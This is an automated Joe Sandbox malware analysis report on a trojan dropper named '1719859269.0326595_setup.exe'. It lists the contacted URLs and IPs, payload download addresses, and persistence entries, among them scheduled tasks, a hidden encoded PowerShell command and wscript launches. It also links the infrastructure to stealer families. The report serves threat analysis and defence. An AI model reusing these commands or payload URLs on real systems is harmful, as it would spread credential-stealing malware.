https://vk.com/zD	1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://monoblocked.com/385137/setup.exeom/	1719859269.0326595_setup.exe, 00000000.00000003.2252257065.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wondershare.com/privacy.html	IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://monoblocked.com/385137/setup.exexe	1719859269.0326595_setup.exe, 00000000.00000003.2234333341.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.000002166383D000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.000002166383D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.syndication.twimg.com	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.vk.com	1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://securepubads.g.doubleclick.net	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wondershare.com/company/end-user-license-agreement.html	IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.ru	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jira.adguard.com/browse/AG-18203.	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website	1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/mine/amadka.exew$	Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://jira.adguard.com/browse/AG-159168	1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://d136azpfpnge1l.cloudfront.net/;	1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sun6-23.userapi.com/zD	1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2252257065.0000021663862000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org/sdgdf/fbghhj/downloads/streamer.exeal	1719859269.0326595_setup.exe, 00000000.00000003.2212265415.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213201982.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2214611152.0000021663881000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2213771278.0000021663881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://st6-21.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2	1719859269.0326595_setup.exe, 00000000.00000003.2264362509.0000021663F76000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265235204.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264205776.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2253179054.0000021663D24000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2251747845.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2254420397.0000021663EA9000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264812556.0000021663D6F000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2264061575.0000021663F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.26.9.59	api.myip.com	United States	13335	CLOUDFLARENETUS	false
77.105.133.27	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	false
87.240.132.78	vk.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
80.78.242.100	unknown	Russian Federation	24971	MASTER-ASCzechRepublicwwwmasterczCZ	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
172.67.132.113	iplogger.org	United States	13335	CLOUDFLARENETUS	false
95.142.206.3	sun6-23.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
95.142.206.2	sun6-22.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.1	sun6-21.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
85.28.47.4	unknown	Russian Federation	31643	GES-ASRU	true
79.174.95.43	a.884736279.xyz	Russian Federation	47385	HOSTING-COMPANY-ASRU	true
77.105.132.27	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	false
3.5.20.219	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
77.105.135.107	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	true
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
207.180.253.128	tea.arpdabl.org	Germany	51167	CONTABODE	false
49.13.159.121	unknown	Germany	24940	HETZNER-ASDE	false
5.42.99.177	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
77.91.77.81	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
77.91.77.80	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
188.114.96.3	lop.foxesjoy.com	European Union	13335	CLOUDFLARENETUS	false
45.130.41.108	monoblocked.com	Russian Federation	198610	BEGET-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465682
Start date and time:	2024-07-02 00:04:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1719859269.0326595_setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@105/154@27/25
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.113.110.67, 13.85.23.86, 192.229.221.95, 20.242.39.171, 93.184.221.240, 40.126.32.140, 40.126.32.68, 20.190.160.14, 20.190.160.17, 40.126.32.134, 20.190.160.20, 40.126.32.133, 40.126.32.76, 104.208.16.94, 184.28.90.27, 52.182.143.212, 13.89.179.12, 142.250.185.74, 142.250.186.42, 216.58.212.170, 142.250.186.138, 142.250.184.234, 142.250.181.234, 142.250.186.170, 142.250.74.202, 142.250.186.106, 172.217.23.106, 172.217.16.138, 172.217.16.202, 172.217.18.10, 142.250.184.202, 142.250.185.106, 216.58.206.74, 172.217.18.14, 20.42.73.29, 20.189.173.21, 40.115.3.253
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, wns.notify.trafficmanager.net, clients2.google.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, onedsblobprdwus16.westus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 1719859269.0326595_setup.exe

Simulations

Behavior and APIs

Time	Type	Description
00:05:27	Task Scheduler	Run new task: WinTrackerSP HR path: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
00:05:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5 C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
00:05:30	Task Scheduler	Run new task: WinTrackerSP LG path: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
00:05:34	Task Scheduler	Run new task: bmQWCxleEgxbTUrSZz path: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe s>xv /uvcdidM 525403 /S
00:05:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV5 C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
00:05:39	Task Scheduler	Run new task: bsqNJSiTyoMLfdbIdy path: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe s>2Z /aXldidQEj 385137 /S
00:05:41	Task Scheduler	Run new task: glCieCmex path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
00:05:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
00:05:48	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
00:06:03	Task Scheduler	Run new task: nsbPTSdSgPuDRRbhc path: C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\zjBNlPS.exe s>X4 /fyLkdidVA 525403 /S
00:06:05	Task Scheduler	Run new task: gjlvHlGGA path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
00:06:23	Task Scheduler	Run new task: KdMGsZYUagVlNoZLt path: C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\fVHLZxG.exe s>WB /qbhOdidgz 385137 /S
00:06:28	Task Scheduler	Run new task: sCSWtvWCwRQeU2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\NonltQQlyMoZtVVB\DmgBeNR.wsf^""
00:06:31	Task Scheduler	Run new task: NvQssOSfNTtis2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\BRUhuLZnBvQZvqVB\gZmyXXu.wsf^""
00:06:33	Task Scheduler	Run new task: ROHimGgVjIIdgMKwK path:
18:05:17	API Interceptor	1x Sleep call for process: 1719859269.0326595_setup.exe modified
18:05:25	API Interceptor	2x Sleep call for process: svchost.exe modified
18:05:27	API Interceptor	1x Sleep call for process: WerFault.exe modified
18:05:27	API Interceptor	1x Sleep call for process: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe modified
18:05:34	API Interceptor	47x Sleep call for process: RegAsm.exe modified
18:05:36	API Interceptor	1x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	Find-DscResource_QoS.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/212.102.41.13/country
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
104.26.9.59	SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exe	Get hash	malicious	PureLog Stealer	Browse
	lgX7lgUL1w.exe	Get hash	malicious	Neoreklami, PureLog Stealer, SmokeLoader	Browse
	SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe	Get hash	malicious	CryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Neoreklami, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse
	file300un.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
77.105.133.27	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.105.133.27/download/123p.exe
77.105.133.27	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	77.105.133.27/download/th/space.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
monoblocked.com	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	45.130.41.108
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	45.130.41.108
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	45.130.41.108
	tZvjMg3Hw9.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	45.130.41.108
	WlCIinu0yp.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT	Browse	45.130.41.108
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	45.130.41.108
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	45.130.41.108
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	45.130.41.108
	80OrFCsz0u.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	45.130.41.108
	SecuriteInfo.com.Win64.Evo-gen.28136.30716.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	45.130.41.108
bitbucket.org	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	104.192.141.1
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	104.192.141.1
	423845.msi	Get hash	malicious	Unknown	Browse	104.192.141.1
	423845.msi	Get hash	malicious	Unknown	Browse	104.192.141.1
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.192.141.1
	YlluVjKozT.exe	Get hash	malicious	LummaC	Browse	104.192.141.1
	AaSwePhLEn.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.192.141.1
	SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exe	Get hash	malicious	LummaC	Browse	104.192.141.1
	nF54KOU30R.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.192.141.1
	dfzesJIgdr.exe	Get hash	malicious	RedLine, Vidar	Browse	104.192.141.1
tea.arpdabl.org	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	207.180.253.128
env-3936544.jcloud.kz	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	185.22.66.15
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	iVO7WjHqxv.exe	Get hash	malicious	Unknown	Browse	185.22.66.15
	eTMLQ4YAGs.exe	Get hash	malicious	Unknown	Browse	185.22.66.15
	dvHLwxPDuR.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15
	OjT67tlLhz.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	aYSD1w3QdX.exe	Get hash	malicious	Unknown	Browse	185.22.66.15
	e3Rl5R1VOz.exe	Get hash	malicious	Unknown	Browse	185.22.66.16
	Kh8lEBG91v.exe	Get hash	malicious	Unknown	Browse	185.22.66.15
	Mhe6NCEUf8.exe	Get hash	malicious	Unknown	Browse	185.22.66.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VKONTAKTE-SPB-AShttpvkcomRU	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	95.142.206.2
	https://vk.com////away.php?to=https://tracker.club-os.com////campaign/click?msgId=d4hu38c6bd137e6a03157c6c728cbc659e734fc398%26test=false%26target=ANToniopneus.com.br/dayo/mnytw/captcha/YXdpbGxpYW1zb25AamVmZnBhcmlzaC5uZXQ=$%C3%A3%E2%82%AC%E2%80%9A	Get hash	malicious	Unknown	Browse	87.240.129.133
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	95.142.206.2
	https://vk.com////away.php?to=https://tracker.club-os.com////campaign/click?msgId=d3xr838c6bd137e6a03157c6c728cbc659e734fc398%26test=false%26target=circuitovtr.com.br/dayo/cezlu/captcha/dGVzdEB0ZXN0LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	87.240.129.133
	http://ct31152.tw1.ru/	Get hash	malicious	Unknown	Browse	87.240.129.133
	http://cb00287.tw1.ru/	Get hash	malicious	Unknown	Browse	95.213.56.1
	AgHiy5gaGp.exe	Get hash	malicious	Amadey, PureLog Stealer	Browse	95.142.206.1
	http://cv59800.tw1.ru/	Get hash	malicious	Unknown	Browse	95.213.56.1
	SecuriteInfo.com.BackDoor.SpyBotNET.62.21177.12908.exe	Get hash	malicious	EICAR, PureLog Stealer, zgRAT	Browse	95.142.206.1
	jew.x86.elf	Get hash	malicious	Unknown	Browse	93.186.225.141
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	16bfcGvz5N.elf	Get hash	malicious	Unknown	Browse	34.118.114.113
	http://www.escalon.services	Get hash	malicious	Unknown	Browse	34.118.20.215
	https://rlcold.com/projects/	Get hash	malicious	Unknown	Browse	34.66.179.7
	Cheat.malware_exe.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	Cheat.malware_exe.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	intimacion6532.msi_intimacion6532.msi_84784.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	ds.zip	Get hash	malicious	LockBit ransomware	Browse	34.117.188.166
	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	34.117.186.192
	D5u70TJkrE.exe	Get hash	malicious	DCRat	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
PLUSTELECOM-ASRU	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	77.105.132.27
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.105.132.27
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	77.105.133.27
	HXUYIDwIMY.exe	Get hash	malicious	Meduza Stealer	Browse	77.105.147.172
	lhZOo8vhuI.elf	Get hash	malicious	Unknown	Browse	77.105.138.202
	file.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	77.105.147.130
	yqeO67O9gY.elf	Get hash	malicious	Mirai	Browse	77.105.140.109
	676767.exe	Get hash	malicious	Remcos	Browse	77.105.132.92
	setup.exe	Get hash	malicious	PureLog Stealer, RHADAMANTHYS	Browse	77.105.147.130
	3.exe	Get hash	malicious	LummaC, Remcos	Browse	77.105.132.92
MASTER-ASCzechRepublicwwwmasterczCZ	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	80.78.242.100
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	80.78.242.100
	AgHiy5gaGp.exe	Get hash	malicious	Amadey, PureLog Stealer	Browse	80.78.242.100
	Rendeles_042024,jpg.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	77.93.220.4
	Fizetes,jpg.scr.exe	Get hash	malicious	AgentTesla	Browse	77.93.220.4
	VkiGKeyI3L.elf	Get hash	malicious	Mirai	Browse	37.205.15.251
	k6AIKkidxG.exe	Get hash	malicious	DCRat	Browse	80.78.243.49
	h08xdwuTfW.elf	Get hash	malicious	Unknown	Browse	185.8.165.122
	TfpwQ763RO.elf	Get hash	malicious	Mirai, Moobot	Browse	185.8.165.146
	quhEKAdhFU.elf	Get hash	malicious	Mirai	Browse	81.31.42.18
CLOUDFLARENETUS	http://sites.google.com/l0gin-microsoftwebonlne.app/867487/	Get hash	malicious	Unknown	Browse	104.19.178.52
	http://sites.google.com/l0gin-microsoftwebonlne.app/867487/	Get hash	malicious	Unknown	Browse	104.19.178.52
	https://www.thaicreate.com/outlink.php?l=https://p6f.org/mI1AchQ3EllQ3Ez01lavallQ3EQ3E2APchD5QD5Q4DCz01oTx4RAW4G	Get hash	malicious	HTMLPhisher	Browse	172.67.176.27
	http://www.midoregon.com	Get hash	malicious	Unknown	Browse	162.247.243.29
	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	Unknown	Browse	104.17.2.184
